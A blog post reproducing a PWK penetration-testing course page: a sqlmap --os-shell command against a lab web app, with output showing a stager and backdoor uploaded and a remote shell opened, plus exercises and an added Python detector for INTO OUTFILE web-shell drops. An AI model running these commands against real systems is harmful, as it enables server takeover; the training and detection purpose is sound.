Wednesday, April 19, 2017

WAF - web application firewall - SQL injection

Penetration Testing with Kali Linux (2014)

Sqlmap contains many advanced features, such as the ability to attempt Web Application Firewall (WAF)[62] bypasses and to execute complex sequences of queries that automate a complete takeover of the server. For example, the --os-shell parameter will attempt to automatically upload and execute a remote command shell on the target.

root@kali:~# sqlmap -u http://192.168.11.35/comment.php?id=738 --dbms=mysql --os-shell
...
[10:31:48] [INFO] trying to upload the file stager on 'C:/xampp/htdocs' via LIMIT INTO OUTFILE technique
[10:31:48] [INFO] heuristics detected web page charset 'ascii'
[10:31:48] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs' - http://192.168.11.35:80/tmpuyjsy.php
[10:31:49] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs' - http://192.168.11.35:80/tmpbtbid.php
[10:31:49] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---

Windows IP Configuration

Ethernet adapter offsec:

Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.11.35
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :

Tunnel adapter isatap.{4C9DFEB3-BCC5-4A44-B797-8DD85F9960D9}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
---
os-shell>

[62] https://www.owasp.org/index.php/Web_Application_Firewall

PWK Copyright © 2014 Offensive Security Ltd. All rights reserved. Page 249 of 361

13.6.1 - Exercises
1. Exploit the SQL injection vulnerability in the guestbook application to log in as
the admin user.
2. Manually use SQL injection to enumerate the information in the guestbook
database.
3. Use sqlmap to obtain a full dump of the database.
4. Use sqlmap to obtain an interactive shell.
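From the defender's side, the stager upload shown in the output above leaves two correlated traces: a LIMIT ... INTO OUTFILE query that writes a file into the web root, followed by an HTTP request for that freshly written file. The following detection logic is an added example, not code from the PWK text or from sqlmap; the MySQL general log, the Apache access log, the client address and the web root it uses are all constructed.

```python
import re
from typing import Dict, List

# Constructed sample logs (not from the original page): a MySQL general query log and an
# Apache access log from a hypothetical XAMPP host whose web root is C:/xampp/htdocs.
WEB_ROOT = "C:/xampp/htdocs"
MYSQL_LOG = """\
2017-04-19T10:31:47Z 12 Query SELECT body FROM comments WHERE id=738
2017-04-19T10:31:48Z 12 Query SELECT body FROM comments WHERE id=738 LIMIT 0,1 INTO OUTFILE 'C:/xampp/htdocs/tmpuyjsy.php'
2017-04-19T10:31:48Z 12 Query SELECT 1 INTO OUTFILE '/tmp/report.csv'
2017-04-19T10:31:50Z 13 Query SELECT name FROM users WHERE id=2
"""
ACCESS_LOG = """\
192.168.11.50 - - [19/Apr/2017:10:31:47 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512
192.168.11.50 - - [19/Apr/2017:10:31:49 +0000] "POST /tmpuyjsy.php HTTP/1.1" 200 88
192.168.11.50 - - [19/Apr/2017:10:31:50 +0000] "GET /index.php HTTP/1.1" 200 2048
"""
OUTFILE_RE = re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')

def _norm(path: str) -> str:
    """Windows paths are case-insensitive and accept either slash style."""
    return path.replace("\\", "/").rstrip("/").lower()

def find_webroot_outfile_writes(mysql_log: str, web_root: str) -> List[str]:
    """Paths written by INTO OUTFILE/DUMPFILE that land inside the web root; an export to /tmp does not match."""
    root = _norm(web_root) + "/"
    hits = []
    for line in mysql_log.splitlines():
        m = OUTFILE_RE.search(line)
        if m and _norm(m.group(1)).startswith(root):
            hits.append(m.group(1))
    return hits

def url_path_for(file_path: str, web_root: str) -> str:
    """Map a file under the web root to the URL path that would serve it."""
    return "/" + _norm(file_path)[len(_norm(web_root)) + 1:]

def find_requests_to_written_files(access_log: str, written: List[str], web_root: str) -> List[str]:
    """Requested URL paths (query string dropped) that hit a file the database just wrote."""
    targets = {url_path_for(p, web_root) for p in written}
    hits = []
    for line in access_log.splitlines():
        m = REQUEST_RE.search(line)
        if m and m.group(1).split("?", 1)[0].lower() in targets:
            hits.append(m.group(1).split("?", 1)[0])
    return hits

def detect_outfile_webshell(mysql_log: str, access_log: str, web_root: str) -> Dict[str, List[str]]:
    """Correlate the two logs: a write into the web root followed by a request for that file."""
    written = find_webroot_outfile_writes(mysql_log, web_root)
    return {"outfile_writes": written,
            "requests_to_written_files": find_requests_to_written_files(access_log, written, web_root)}
```

Running the general query log in production is expensive; the same OUTFILE check can be applied to audit-plugin output, and the second half (a request for a file the database wrote) is what separates a web shell drop from a legitimate export.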
